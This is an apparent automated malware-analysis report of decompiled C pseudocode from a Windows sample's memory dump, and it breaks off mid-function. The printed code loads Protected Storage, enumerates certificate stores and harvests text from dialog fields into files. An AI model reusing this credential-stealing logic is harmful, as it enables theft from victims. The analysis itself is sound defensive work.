				_t7 = GetTimeZoneInformation(_t12 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t12 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t12 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t12 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}








        0x0040f273
        0x0040f281
        0x0040f28a
        0x0040f294
        0x0040f2a3
        0x0040f296
        0x0040f296
        0x00000000
        0x0040f296
        0x0040f28c
        0x0040f28c
        0x0040f299
        0x0040f29e
        0x0040f29e
        0x0040f2a9

        APIs
        • GetTimeZoneInformation.KERNEL32(?), ref: 0040F281
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: InformationTimeZone
        • String ID:
        • API String ID: 565725191-0
        • Opcode ID: 39a509d7ec5f0773fff989cfa16d5616b8cb6f3bbb15af31aea5748086680c85
        • Instruction ID: c11e6b97314f4233d0158c1f4906bae7ba20c7f19be4bdcddf27278268f52110
        • Opcode Fuzzy Hash: 39a509d7ec5f0773fff989cfa16d5616b8cb6f3bbb15af31aea5748086680c85
        • Instruction Fuzzy Hash: B1E08635A48109CBDB34DBE4FD4199E77E9A745314F20097EE402F3AC0D23DDD498A06
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004103AE, Relevance: .2, Instructions: 190COMMONCrypto
        Download Yara Rule
        C-Code - Quality: 98%
        			E004103AE(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				unsigned int _t67;
				signed int _t68;
				intOrPtr _t71;
				void* _t79;
				signed int _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				unsigned int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t119;
				unsigned int _t125;
				signed int _t126;
				signed int _t128;

				_t71 = _a4;
				_t98 = 0;
				_t99 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t99 <= 0) {
						_t103 =  *(_t98 + _t71);
						_t98 = _t98 + 4;
						_t99 = 0x1f;
						_t104 = _t103 >> 0x1f;
					} else {
						_t99 = _t99 - 1;
						_t104 = _t67 >> _t99 & 0x00000001;
					}
					if(_t104 != 0) {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
						_t98 = _t98 + 1;
						L6:
						_t71 = _a4;
						continue;
					}
					_v12 = 1;
					do {
						if(_t99 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t100 = 0x1f;
							_t106 = _t67 >> 0x1f;
						} else {
							_t100 = _t99 - 1;
							_t106 = _t67 >> _t100 & 0x00000001;
						}
						_v12 = _t106 + _v12 * 2;
						if(_t100 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t108 = _t67 >> 0x1f;
						} else {
							_t99 = _t100 - 1;
							_t108 = _t67 >> _t99 & 0x00000001;
						}
					} while (_t108 == 0);
					_t111 = _v12;
					if(_t111 == 2) {
						_t81 = _v20;
						L19:
						_v12 = _t81;
						if(_t99 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t101 = 0x1f;
							_v8 = _t67 >> 0x1f;
						} else {
							_t101 = _t99 - 1;
							_v8 = _t67 >> _t101 & 0x00000001;
						}
						if(_t101 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t115 = _t67 >> 0x1f;
						} else {
							_t99 = _t101 - 1;
							_t115 = _t67 >> _t99 & 0x00000001;
						}
						_t116 = _t115 + _v8 * 2;
						_v8 = _t116;
						if(_t116 == 0) {
							_v8 = 1;
							do {
								if(_t99 <= 0) {
									_t125 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t102 = 0x1f;
									_t126 = _t125 >> 0x1f;
								} else {
									_t102 = _t99 - 1;
									_t126 = _t67 >> _t102 & 0x00000001;
								}
								_v8 = _t126 + _v8 * 2;
								if(_t102 <= 0) {
									_t67 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t99 = 0x1f;
									_t128 = _t67 >> 0x1f;
								} else {
									_t99 = _t102 - 1;
									_t128 = _t67 >> _t99 & 0x00000001;
								}
							} while (_t128 == 0);
							_v8 = _v8 + 2;
						}
						asm("sbb ecx, ecx");
						_v8 = _v8 +  ~0xd00;
						_t87 = _v16;
						_t119 = _t87 - _v12 + _a12;
						_v16 = _t119;
						 *((char*)(_t87 + _a12)) =  *_t119;
						_t88 = _t87 + 1;
						_v16 = _v16 + 1;
						do {
							 *((char*)(_t88 + _a12)) =  *_v16;
							_t88 = _t88 + 1;
							_v16 = _v16 + 1;
							_t57 =  &_v8;
							 *_t57 = _v8 - 1;
						} while ( *_t57 != 0);
						_v16 = _t88;
						goto L6;
					}
					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
					_t98 = _t98 + 1;
					if(_t79 != 0xffffffff) {
						_t81 = _t79 + 1;
						_v20 = _t81;
						goto L19;
					}
					_t68 = _a16;
					 *_t68 = _v16;
					return _t68 & 0xffffff00 | _t98 == _a8;
				}
			}






























        0x004103b5
        0x004103b9
        0x004103be
        0x004103c0
        0x004103c3
        0x00000000
        0x004103ca
        0x004103cc
        0x004103df
        0x004103e1
        0x004103e4
        0x004103e5
        0x004103ce
        0x004103ce
        0x004103d5
        0x004103d5
        0x004103ea
        0x004103f5
        0x004103f8
        0x004103fb
        0x004103fc
        0x004103fc
        0x00000000
        0x004103fc
        0x00410401
        0x00410408
        0x0041040a
        0x00410418
        0x0041041f
        0x00410422
        0x00410423
        0x0041040c
        0x0041040c
        0x00410413
        0x00410413
        0x0041042c
        0x00410431
        0x0041043f
        0x00410446
        0x00410449
        0x0041044a
        0x00410433
        0x00410433
        0x0041043a
        0x0041043a
        0x0041044d
        0x00410451
        0x00410457
        0x00410459
        0x00410478
        0x00410478
        0x0041047d
        0x0041048e
        0x00410493
        0x0041049b
        0x0041049c
        0x0041047f
        0x0041047f
        0x00410489
        0x00410489
        0x004104a1
        0x004104af
        0x004104b6
        0x004104b9
        0x004104ba
        0x004104a3
        0x004104a3
        0x004104aa
        0x004104aa
        0x004104c0
        0x004104c3
        0x004104c8
        0x004104ca
        0x004104d1
        0x004104d3
        0x004104e6
        0x004104e8
        0x004104eb
        0x004104ec
        0x004104d5
        0x004104d5
        0x004104dc
        0x004104dc
        0x004104f5
        0x004104fa
        0x00410508
        0x0041050f
        0x00410512
        0x00410513
        0x004104fc
        0x004104fc
        0x00410503
        0x00410503
        0x00410516
        0x0041051a
        0x0041051a
        0x00410526
        0x0041052a
        0x0041052d
        0x00410535
        0x0041053a
        0x00410540
        0x00410543
        0x00410544
        0x00410547
        0x0041054f
        0x00410552
        0x00410553
        0x00410556
        0x00410556
        0x00410556
        0x0041055b
        0x00000000
        0x0041055b
        0x00410468
        0x0041046a
        0x0041046e
        0x00410474
        0x00410475
        0x00000000
        0x00410475
        0x00410563
        0x0041056e
        0x00410575
        0x00410575

        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
        • Instruction ID: 8b3ed8ea53b6ed028aa8ddf7134e7d0d6a82fb9283c54b5096e5c9e2e926022a
        • Opcode Fuzzy Hash: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
        • Instruction Fuzzy Hash: 6B51D832E00A299BDB14CE58C4502EDF7B1EF85324F1A41AACD56BF381D6B4ADC1DB84
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004100D7, Relevance: .1, Instructions: 72COMMONCrypto
        Download Yara Rule
        C-Code - Quality: 100%
        			E004100D7() {
				signed int _t18;
				signed int _t38;
				signed int _t55;
				signed int _t56;
				signed int* _t59;
				signed int _t60;
				signed int* _t61;

				_t18 =  *0x415fa4; // 0x191
				if(_t18 >= 0x270) {
					_t60 = 0;
					do {
						_t55 = _t60 << 2;
						_t1 = _t55 + 0x4155dc; // 0xa15c94c5
						_t2 = 0x4155d8 + _t55; // 0xea900f15
						_t3 = 0x4155d8 + _t55; // 0xea900f15
						_t6 = _t55 + 0x415c0c; // 0xcc52a6db
						_t60 = _t60 + 1;
						 *(0x4155d8 + _t55) = (( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) >> 0x00000001 ^  *(0x414534 + ((( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) & 0x00000001) * 4) ^  *_t6;
					} while (_t60 < 0xe3);
					if(_t60 < 0x26f) {
						_t59 =  &(0x4155d8[_t60]);
						do {
							_t10 =  &(_t59[1]); // 0x4
							_t61 = _t10;
							 *_t59 =  *(0x414534 + ((( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) & 0x00000001) * 4) ^  *(_t61 - 0x390) ^ (( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) >> 0x00000001;
							_t59 = _t61;
						} while (_t59 < 0x415f94);
					}
					_t56 =  *0x415f94; // 0x787f3bca
					_t38 =  *0x4155d8; // 0xea900f15
					 *0x415f94 = ((_t38 ^ _t56) & 0x7fffffff ^ _t56) >> 0x00000001 ^  *(0x414534 + (((_t38 ^ _t56) & 0x7fffffff ^ _t56) & 0x00000001) * 4) ^  *0x415c08;
					_t18 = 0;
				}
				 *0x415fa4 = _t18 + 1;
				return (0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b ^ ((0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b ^ ((0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b ^ ((0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b ^ ((0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}










        0x004100d7
        0x004100e1
        0x004100e9
        0x004100f0
        0x004100f2
        0x004100f5
        0x004100fb
        0x00410103
        0x00410117
        0x0041011d
        0x00410124
        0x00410124
        0x00410132
        0x00410134
        0x0041013b
        0x0041013d
        0x0041013d
        0x0041015c
        0x0041015e
        0x00410160
        0x0041013b
        0x00410168
        0x0041016e
        0x0041018f
        0x00410194
        0x00410194
        0x0041019e
        0x004101c9

        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 70b894a97b3990c829c72de1d08ce55cf70c0e5e058ff0cc01cfce1a1c5a6acb
        • Instruction ID: 52c786fe84f74037f7caae4f787f933e7ce83a8d22a1e5ce0a6b82dd9a185fe3
        • Opcode Fuzzy Hash: 70b894a97b3990c829c72de1d08ce55cf70c0e5e058ff0cc01cfce1a1c5a6acb
        • Instruction Fuzzy Hash: E6213C36221801DFD748CF38DC996D633E3E7C93187298579D119CB294DA3AE453CB48
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040586C, Relevance: 52.7, APIs: 17, Strings: 13, Instructions: 212stringprocessencryptionCOMMON
        Download Yara Rule
        C-Code - Quality: 66%
        			E0040586C(void* __ecx) {
				intOrPtr _v1064;
				intOrPtr _v1084;
				void* _v1088;
				void* _v1096;
				short _v1588;
				void* _v1592;
				struct HINSTANCE__* _v1596;
				char _v1600;
				signed int _v1604;
				short _v1608;
				intOrPtr _v1612;
				WCHAR* _t59;
				int _t62;
				void* _t67;
				intOrPtr _t70;
				void* _t75;
				void* _t86;
				void* _t90;
				void* _t96;
				void* _t101;
				WCHAR* _t104;
				WCHAR* _t106;
				WCHAR* _t107;
				void* _t114;

				_t101 = __ecx;
				 *0x414780 = 0;
				 *0x41479c = 0;
				 *0x41479f = 0;
				 *0x41479e = GetModuleHandleA("rndhook.dll") & 0xffffff00 | _t36 != 0x00000000;
				 *0x41479d = 1;
				E0040AEF2(0);
				E00412C8D();
				L00404155();
				E0040882D();
				 *0x415fb0 = 0;
				_v1600 = 1;
				lstrcpyW( &_v1588,  *0x414a3c);
				_t104 = L"rsldps";
				lstrcatW( &_v1588, _t104);
				_v1592 = CreateMutexW(0x4155b4, 1, _t104);
				if(GetLastError() == 0) {
					_t106 = "09ck_=ldfuihpfre";
					_t67 = E004089BF(_t47, _t101, 1, _t106);
					_t121 = _t67 - 4;
					if(_t67 != 4) {
						E00404FFB();
						_push( &_v1600);
						_push(_t106);
						_push(1);
						_t96 = 4;
						E00408A2F(_t96, _t121);
					}
					_t107 = "3709128dk0023444";
					_v1604 = 0;
					if(E004089BF( &_v1604, _t101, 1, _t107) != 4) {
						_v1596 = 0;
					} else {
						_v1596 =  *_v1604;
					}
					_t70 = E004045A1(_t101, 0, L"MY", 0, _v1596);
					_v1612 = _t70;
					_t123 = _t70 - _v1608;
					if(_t70 != _v1608) {
						_push( &_v1600);
						_push(_t107);
						_push(1);
						_t90 = 4;
						E00408A2F(_t90, _t123);
					}
					E0040F15E(_v1604);
					_v1608 = 0;
					if(E004089BF( &_v1608, _t101, 1, "!!!0-0=9-0=23434") != 0) {
						_t86 = E00408668(_t101, _v1604, _t73);
						_t125 = _t86;
						if(_t86 != 0) {
							E00408AA6(_t125, 1, "!!!0-0=9-0=23434");
						}
						E0040F15E(_v1604);
					}
					_t75 = E004089BF(0, _t101, 1, "~23324m\'m434dKkl");
					_t126 = _t75 - 4;
					if(_t75 == 4) {
						 *0x414c24(0x10000, 0, 0, E004046EE);
						E00408AA6(_t126, 1, "~23324m\'m434dKkl");
					}
					_v1604 = 0;
					if(E004089BF( &_v1604, _t101, 1, "3208()_*09303333") == 4) {
						E004053C0((_v1604 & 0xffffff00 |  *_v1604 == 0x00000000) & 0x000000ff);
						E00408AA6( *_v1604 == 0, 1, "3208()_*09303333");
					}
					E0040F15E(_v1604);
				}
				if(_v1592 != 0) {
					CloseHandle(_v1592);
				}
				 *0x414f9c = 0;
				 *0x414f98 = 0;
				 *0x414ed4("urityDescriptorToAccessNamedA");
				 *0x414f5c = 0;
				 *0x414f58 = 0;
				 *0x414f60 = 0;
				 *0x414f64 = 0;
				 *0x414ed4("essAsUserA");
				 *0x414ed4(0x4147a4);
				 *0x4147c4 = 0;
				E004063F9();
				 *0x4147c8 = 0;
				 *0x4147c0 = 0;
				 *0x414d14 = 0;
				 *0x414f24 = 0x2d;
				 *0x414f14 = 0x2d;
				 *0x414f25 = 0;
				 *0x414f15 = 0;
				 *0x414ed4("FrameRect");
				_v1084 = 0x428;
				_t114 = CreateToolhelp32Snapshot(8,  *0x414c94);
				if(_t114 == 0xffffffff) {
					L23:
					if(GetModuleFileNameW(0,  &_v1608, 0x103) > 0xa) {
						_t59 = PathFindFileNameW( &_v1608);
						if(_t59 != 0 && lstrcmpiW(_t59, L"osl2sks.exe") == 0) {
							 *0x41479f = 1;
						}
					}
					return 1;
				} else {
					_t62 = Module32FirstW(_t114,  &_v1088);
					while(_t62 != 0) {
						E00407A50(0x4144e0, _t101, 0, _v1064);
						_t62 = Module32NextW(_t114,  &_v1096);
					}
					goto L23;
				}
			}



























        0x0040586c
        0x00405882
        0x00405888
        0x0040588e
        0x004058a1
        0x004058a6
        0x004058ad
        0x004058b2
        0x004058b7
        0x004058bc
        0x004058cf
        0x004058d5
        0x004058d9
        0x004058df
        0x004058ea
        0x004058fd
        0x00405909
        0x0040590f
        0x00405916
        0x0040591b
        0x0040591e
        0x00405920
        0x00405929
        0x0040592a
        0x0040592b
        0x0040592e
        0x0040592f
        0x0040592f
        0x00405934
        0x0040593f
        0x0040594b
        0x00405959
        0x0040594d
        0x00405953
        0x00405953
        0x00405967
        0x0040596c
        0x00405970
        0x00405974
        0x0040597a
        0x0040597b
        0x0040597c
        0x0040597f
        0x00405980
        0x00405980
        0x00405989
        0x00405999
        0x004059a4
        0x004059ab
        0x004059b0
        0x004059b2
        0x004059b6
        0x004059b6
        0x004059bf
        0x004059bf
        0x004059cd
        0x004059d2
        0x004059d5
        0x004059e3
        0x004059eb
        0x004059eb
        0x004059fb
        0x00405a07
        0x00405a16
        0x00405a1d
        0x00405a1d
        0x00405a26
        0x00405a26
        0x00405a2f
        0x00405a35
        0x00405a35
        0x00405a40
        0x00405a46
        0x00405a4c
        0x00405a57
        0x00405a5d
        0x00405a63
        0x00405a69
        0x00405a6f
        0x00405a7a
        0x00405a80
        0x00405a86
        0x00405a92
        0x00405a98
        0x00405a9e
        0x00405aa4
        0x00405aab
        0x00405ab2
        0x00405ab8
        0x00405abe
        0x00405aca
        0x00405add
        0x00405ae2
        0x00405b19
        0x00405b2d
        0x00405b34
        0x00405b3c
        0x00405b4e
        0x00405b4e
        0x00405b3c
        0x00405b5d
        0x00405ae4
        0x00405aed
        0x00405b15
        0x00405b01
        0x00405b0f
        0x00405b0f
        0x00000000
        0x00405b15

        APIs
        • GetModuleHandleA.KERNEL32(rndhook.dll), ref: 00405894
          • Part of subcall function 0040AEF2: CharLowerBuffA.USER32(00000000,00000031,?,?,?,?,00000001,?,00000002), ref: 0040B025
          • Part of subcall function 00412C8D: PathCombineW.SHLWAPI(?,0241F5A8,?), ref: 00412CB4
          • Part of subcall function 00412C8D: PathCombineW.SHLWAPI(yNameW,yNameW,?), ref: 00412CC3
        • lstrcpyW.KERNEL32(?), ref: 004058D9
        • lstrcatW.KERNEL32(?,rsldps), ref: 004058EA
        • CreateMutexW.KERNEL32(004155B4,00000001,rsldps), ref: 004058F7
        • GetLastError.KERNEL32 ref: 00405901
        • CertEnumSystemStore.CRYPT32(00010000,00000000,00000000,004046EE), ref: 004059E3
        • CloseHandle.KERNEL32(?), ref: 00405A35
        • RtlInitializeCriticalSection.NTDLL(urityDescriptorToAccessNamedA), ref: 00405A4C
        • RtlInitializeCriticalSection.NTDLL(essAsUserA), ref: 00405A6F
        • RtlInitializeCriticalSection.NTDLL(004147A4), ref: 00405A7A
        • RtlInitializeCriticalSection.NTDLL(FrameRect), ref: 00405ABE
        • CreateToolhelp32Snapshot.KERNEL32(00000008), ref: 00405AD7
        • Module32FirstW.KERNEL32(00000000,?), ref: 00405AED
        • Module32NextW.KERNEL32(00000000,?), ref: 00405B0F
          • Part of subcall function 00404FFB: LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00405011
          • Part of subcall function 00404FFB: GetProcAddress.KERNELBASE(00000000), ref: 00405018
        • GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 00405B24
        • PathFindFileNameW.SHLWAPI(?), ref: 00405B34
        • lstrcmpiW.KERNEL32(00000000,osl2sks.exe), ref: 00405B44
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalInitializeSection$Path$CombineCreateFileHandleModuleModule32Name$AddressBuffCertCharCloseEnumErrorFindFirstLastLibraryLoadLowerMutexNextProcSnapshotStoreSystemToolhelp32lstrcatlstrcmpilstrcpy
        • String ID: !!!0-0=9-0=23434$09ck_=ldfuihpfre$3208()_*09303333$3709128dk0023444$FrameRect$ageW$eateProcessAsUserA$esA$osl2sks.exe$rndhook.dll$rsldps$urityDescriptorToAccessNamedA$~23324m'm434dKkl
        • API String ID: 807594470-2706104865
        • Opcode ID: 43b79262da27aa19cbcf072ac9da5f090808976af4895ba3a418bd811c1c7f2a
        • Instruction ID: ab620f3749bfd49a8e89e1d76c1992060f070b704acf4078ca298003f8e660e3
        • Opcode Fuzzy Hash: 43b79262da27aa19cbcf072ac9da5f090808976af4895ba3a418bd811c1c7f2a
        • Instruction Fuzzy Hash: 0571B2B1504341AFC720AF62ED49A9B7BA8EBD5714F00843FF455A22E1CB389944CB6E
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040C34D, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 177stringCOMMON
        Download Yara Rule
        C-Code - Quality: 60%
        			E0040C34D(struct HWND__* __eax, void* __edx) {
				int _t24;
				intOrPtr _t27;
				signed int _t30;
				struct HWND__* _t37;
				int _t58;
				void* _t59;
				void* _t60;
				struct HWND__* _t62;
				int _t68;
				WCHAR* _t69;
				void* _t70;
				void* _t72;
				intOrPtr _t78;

				_t60 = __edx;
				_t24 = __eax;
				_t70 = _t72 - 0x74;
				_t62 = __eax;
				_t78 =  *0x414d14; // 0x1d50065
				if(_t78 == 0 ||  *((intOrPtr*)(_t70 + 0x7c)) != 1) {
					L22:
					return _t24;
				} else {
					GetWindowTextW(__eax, _t70 - 0x64, 0x64);
					_t27 =  *0x414ad4; // 0x241f5a8
					_t24 = StrStrW(_t70 - 0x64,  *(_t27 + 0x190));
					if(_t24 == 0) {
						goto L22;
					}
					_t24 = GetDlgItem(_t62, 1);
					if(_t24 == 0) {
						goto L22;
					}
					_t24 = GetDlgItem(_t62, 2);
					if(_t24 == 0) {
						goto L22;
					}
					if(GetDlgItem(_t62, 0x142) == 0 || GetDlgItem(_t62, 0x396) == 0) {
						_t30 = GetDlgItem(_t62, 0xe2);
						__eflags = _t30;
						if(_t30 == 0) {
							L16:
							_t24 = GetDlgItem(_t62, 0x203);
							__eflags = _t24;
							if(_t24 == 0) {
								L21:
								goto L22;
							}
							_t24 =  *0x414ab8(GetDlgItem(_t62, 0x115), 0xfffffff0);
							__eflags = _t24 & 0x00000020;
							if((_t24 & 0x00000020) == 0) {
								goto L21;
							}
							_t24 = GetDlgItemTextA(_t62, 0x115, _t70 - 0x198, 0x100);
							_t68 = _t24;
							__eflags = _t68 - 2;
							if(_t68 <= 2) {
								goto L21;
							}
							wnsprintfW(_t70 - 0x64, 0x63, L"kwm\\%S.%s", "rlappedAccessResults", L"txt");
							_push(_t68);
							_push(_t70 - 0x198);
							_push(_t70 - 0x64);
							_push(0);
							L20:
							_push(3);
							_t24 = E0041341D(_t59, _t60);
							goto L21;
						}
						_t37 = GetDlgItem(_t62, 0xe1);
						__eflags = _t37;
						if(_t37 == 0) {
							goto L16;
						}
						_t24 = GetDlgItemTextW(_t62, 0xd2, _t70 - 0x3a0, 0x104);
						__eflags = _t24 - 5;
						if(_t24 <= 5) {
							goto L21;
						}
						_t24 = GetDlgItemTextA(_t62, 0xd8, _t70 - 0x198, 0x100);
						_t58 = _t24;
						__eflags = _t58 - 2;
						if(__eflags <= 0) {
							goto L21;
						}
						_t69 = L"kwm\\%S.%s";
						wnsprintfW(_t70 - 0x64, 0x63, _t69, 0x414f14, L"kwm");
						_t24 = E00413599(_t59, _t60, __eflags, _t70 - 0x3a0, 0, _t70 - 0x64);
						__eflags = _t24;
						if(_t24 == 0) {
							goto L21;
						}
						wnsprintfW(_t70 - 0x64, 0x63, _t69, 0x414f14, L"txt");
						_push(_t58);
						_push(_t70 - 0x198);
						_push(_t70 - 0x64);
						_push(0);
						goto L20;
					} else {
						_t24 = GetDlgItemTextA(_t62, 0x124, _t70 + 0x64, 0xd);
						if(_t24 == 0xc) {
							_t24 = GetDlgItemTextA(_t62, 0x125, _t70 - 0x98, 0x32);
							if(_t24 > 2) {
								 *0x414dd8("rlappedAccessResults", _t70 + 0x64);
								 *0x414dd8("ults", _t70 - 0x98);
								_t24 = E0040B81A(_t59, E0040BFC9, 0);
							}
						}
						goto L22;
					}
				}
			}
















        0x0040c34d
        0x0040c34d
        0x0040c34e
        0x0040c35c
        0x0040c35e
        0x0040c364
        0x0040c58f
        0x0040c595
        0x0040c374
        0x0040c37b
        0x0040c381
        0x0040c390
        0x0040c398
        0x00000000
        0x00000000
        0x0040c3a1
        0x0040c3a9
        0x00000000
        0x00000000
        0x0040c3b2
        0x0040c3ba
        0x00000000
        0x00000000
        0x0040c3ce
        0x0040c451
        0x0040c457
        0x0040c459
        0x0040c517
        0x0040c51d
        0x0040c523
        0x0040c525
        0x0040c58e
        0x00000000
        0x0040c58e
        0x0040c537
        0x0040c53d
        0x0040c53f
        0x00000000
        0x00000000
        0x0040c54f
        0x0040c555
        0x0040c557
        0x0040c55a
        0x00000000
        0x00000000
        0x0040c571
        0x0040c57a
        0x0040c581
        0x0040c585
        0x0040c586
        0x0040c587
        0x0040c587
        0x0040c589
        0x00000000
        0x0040c589
        0x0040c465
        0x0040c46b
        0x0040c46d
        0x00000000
        0x00000000
        0x0040c485
        0x0040c48b
        0x0040c48e
        0x00000000
        0x00000000
        0x0040c4a6
        0x0040c4ac
        0x0040c4ae
        0x0040c4b1
        0x00000000
        0x00000000
        0x0040c4c2
        0x0040c4ce
        0x0040c4e4
        0x0040c4e9
        0x0040c4eb
        0x00000000
        0x00000000
        0x0040c4fe
        0x0040c507
        0x0040c50e
        0x0040c512
        0x0040c513
        0x00000000
        0x0040c3e0
        0x0040c3ec
        0x0040c3f5
        0x0040c40a
        0x0040c413
        0x0040c422
        0x0040c434
        0x0040c440
        0x0040c440
        0x0040c413
        0x00000000
        0x0040c3f5
        0x0040c3ce

        APIs
        • GetWindowTextW.USER32(?,?,00000064), ref: 0040C37B
        • StrStrW.SHLWAPI(?,?,?,00000000), ref: 0040C390
        • GetDlgItem.USER32(?,00000001), ref: 0040C3A1
        • GetDlgItem.USER32(?,00000002), ref: 0040C3B2
        • GetDlgItem.USER32(?,00000142), ref: 0040C3C6
        • GetDlgItem.USER32(?,00000396), ref: 0040C3D6
        • GetDlgItemTextA.USER32(?,00000124,?,0000000D), ref: 0040C3EC
        • GetDlgItemTextA.USER32(?,00000125,?,00000032), ref: 0040C40A
        • lstrcpy.KERNEL32(rlappedAccessResults,?), ref: 0040C422
        • lstrcpy.KERNEL32(ults,?), ref: 0040C434
          • Part of subcall function 0040B81A: CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0040B830
          • Part of subcall function 0040B81A: CloseHandle.KERNEL32(00000000,?,?,0040C445,0040BFC9,00000000,?,00000000), ref: 0040B837
        • GetDlgItem.USER32(?,000000E2), ref: 0040C451
        • GetDlgItem.USER32(?,000000E1), ref: 0040C465
        • GetDlgItemTextW.USER32(?,000000D2,?,00000104), ref: 0040C485
        • GetDlgItemTextA.USER32(?,000000D8,?,00000100), ref: 0040C4A6
        • wnsprintfW.SHLWAPI ref: 0040C4CE
        • wnsprintfW.SHLWAPI ref: 0040C4FE
        • GetDlgItem.USER32(?,00000203), ref: 0040C51D
        • GetDlgItem.USER32(?,00000115), ref: 0040C530
        • GetDlgItemTextA.USER32(?,00000115,?,00000100), ref: 0040C54F
        • wnsprintfW.SHLWAPI ref: 0040C571
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Item$Text$wnsprintf$lstrcpy$CloseCreateHandleThreadWindow
        • String ID: kwm$kwm\%S.%s$rlappedAccessResults$txt
        • API String ID: 3236458500-3919458511
        • Opcode ID: d9c6686378021a613eeac201a07cf7d3d07698e70632bfdae35dbf3121379460
        • Instruction ID: 5d2fe1c06c2eb22c66538d8d224e61cf568f620e902f0f0f3d4b9037554a9eb0
        • Opcode Fuzzy Hash: d9c6686378021a613eeac201a07cf7d3d07698e70632bfdae35dbf3121379460
        • Instruction Fuzzy Hash: 3F518E71680218BFD7209BA09D89FFB367CAF85B41F114536FA09F61C0D7789A448B6D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040BFC9, Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 268windowthreadstringCOMMON
        Download Yara Rule
        C-Code - Quality: 77%
        			E0040BFC9() {
				int _v8;
				struct HWND__* _v12;
				short _v16;
				signed int _v20;
				long _v24;
				char _v28;
				int _v32;
				long _v36;
				struct HWND__* _v40;
				short _v42;
				short _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v88;
				CHAR* _v92;
				int _v104;
				int _v108;
				void* _v112;
				short _v130;
				char _v132;
				short _v330;
				char _v332;
				intOrPtr _t88;
				struct HWND__* _t89;
				intOrPtr _t93;
				int _t96;
				int _t99;
				long _t107;
				CHAR* _t108;
				char* _t112;
				int _t116;
				long _t117;
				int _t119;
				int _t123;
				short _t124;
				char _t132;
				int _t135;
				signed int _t136;
				signed char _t142;
				signed char _t145;
				intOrPtr _t152;
				signed char _t153;
				signed int _t154;
				int _t155;
				struct HWND__* _t157;
				signed int _t158;
				void* _t162;
				void* _t163;

				SetThreadPriority(GetCurrentThread(), 0xfffffffe);
				_t155 = 0;
				_v16 = 0;
				while(1) {
					L1:
					Sleep(0x2710);
					_t88 =  *0x414ad4; // 0x241f5a8
					_push( *((intOrPtr*)(_t88 + 0x194)));
					_push(0x8002);
					_push(_t155);
					while(1) {
						L8:
						_t89 = FindWindowExW(_t155, ??, ??, ??);
						_v12 = _t89;
						if(_t89 == _t155) {
							goto L1;
						}
						_v24 = _t155;
						GetWindowThreadProcessId(_v12,  &_v24);
						__eflags = _v24 -  *0x414c94; // 0x1030
						if(__eflags != 0) {
							L7:
